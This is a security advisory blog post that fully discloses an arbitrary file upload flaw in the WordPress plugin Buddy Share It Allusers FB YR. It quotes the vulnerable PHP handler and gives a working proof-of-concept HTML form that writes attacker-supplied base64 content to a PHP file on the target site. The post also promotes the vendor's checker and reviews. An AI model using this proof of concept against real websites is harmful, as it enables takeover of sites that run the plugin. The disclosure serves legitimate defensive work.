03 Jan

Our Plugin Security Checker Can Now Spot More Possible Issues Leading to Arbitrary File Upload Vulnerabilities

As we have mentioned before, we recently improved our proactive monitoring of changes being made to WordPress plugins to try to catch serious vulnerabilities when they are introduced in to plugins, to build on code we had developed for our Plugin Security Checker, an automated tool you can use to check if plugins you use contain possible security issues. That in turn has allowed us to easily test out new checks for our Plugin Security Checker across a lot of code before introducing it to the public, which makes it easier to improve that tool while not causing unnecessary issues for people using the Plugin Security Checker. One of the checks we have been testing out has now spotted one of the most likely to be exploited types of vulnerabilities, an arbitrary file upload vulnerability, in the plugin Buddy Share It Allusers FB YR, which would allow a hacker to take control of website by adding a file with malicious code to it.

This vulnerability is yet another good reason to check plugins you use through our Plugin Security Checker since it can now alert you if plugins you use possibly contain a similar issue (and possibly contain a lot of other serious vulnerabilities). From there if you are a paying customer of our service you can suggest/vote for it to receive a security review that will check over that or you can order the same type of review separately.

Also of note here is that the vulnerability exist in part due to a lack of protection against directly accessing the file with the vulnerable code in it, which is something we frequently find isn’t being done when we check for it during security reviews of WordPress plugins.

Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that since a previously full disclosed vulnerability was quickly on hackers’ radar, but it appears those moderators have such disdain for the rest of the WordPress community that their continued ability to act inappropriate is more important that what is best for the rest of the community.

Technical Details

In the file /yr-bpshare-hnd.php, the first code in it will run the function yr_bpshare_options_handler:

3
$yr_bpshare_redir = yr_bpshare_options_handler();

That function will write data specified with the POST input “initlines” (base64 decoding it first) to a file specified by the POST input “optpath”:

4
5
6
7
8
9
10
11
12
13
14
15
function yr_bpshare_options_handler() {
 
	if ( $_POST ) {    // !empty($_POST) 
		$yr_bpshare_linemax = $_POST["linemax"];
		$yr_noname1 = $_POST["noname1"];
		$yr_bpshare_optpath = $_POST["optpath"];
		$yr_bpshare_redir = $_POST["redir"];
		$yr_bpshare_options_lines_init_ser = base64_decode($_POST["initlines"]);
 
		if ($_POST["reset"] == "Reset") {  // reset in file
			$fptr = fopen($yr_bpshare_optpath, 'w');
			fwrite($fptr,$yr_bpshare_options_lines_init_ser);

Proof of Concept

The following proof of concept will cause the specified content to be uploaded to the file /wp-content/plugins/buddy-share-it-allusers-fb-yr/test.php.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[base64 encoded contents of the file]” with the base64 encoded version of the contents of the file to be uploaded.

<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/buddy-share-it-allusers-fb-yr/yr-bpshare-hnd.php" method="POST">
<input type="hidden" name="optpath" value="test.php" />
<input type="hidden" name="initlines" value="[base64 encoded contents of the file]" />
<input type="hidden" name="reset" value="Reset" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Concerned About The Security of the Plugins You Use?

To make sure a plugin you are using or considering using has been properly secured you get a complete security review of it from us.

Leave a Reply

Your email address will not be published. Required fields are marked *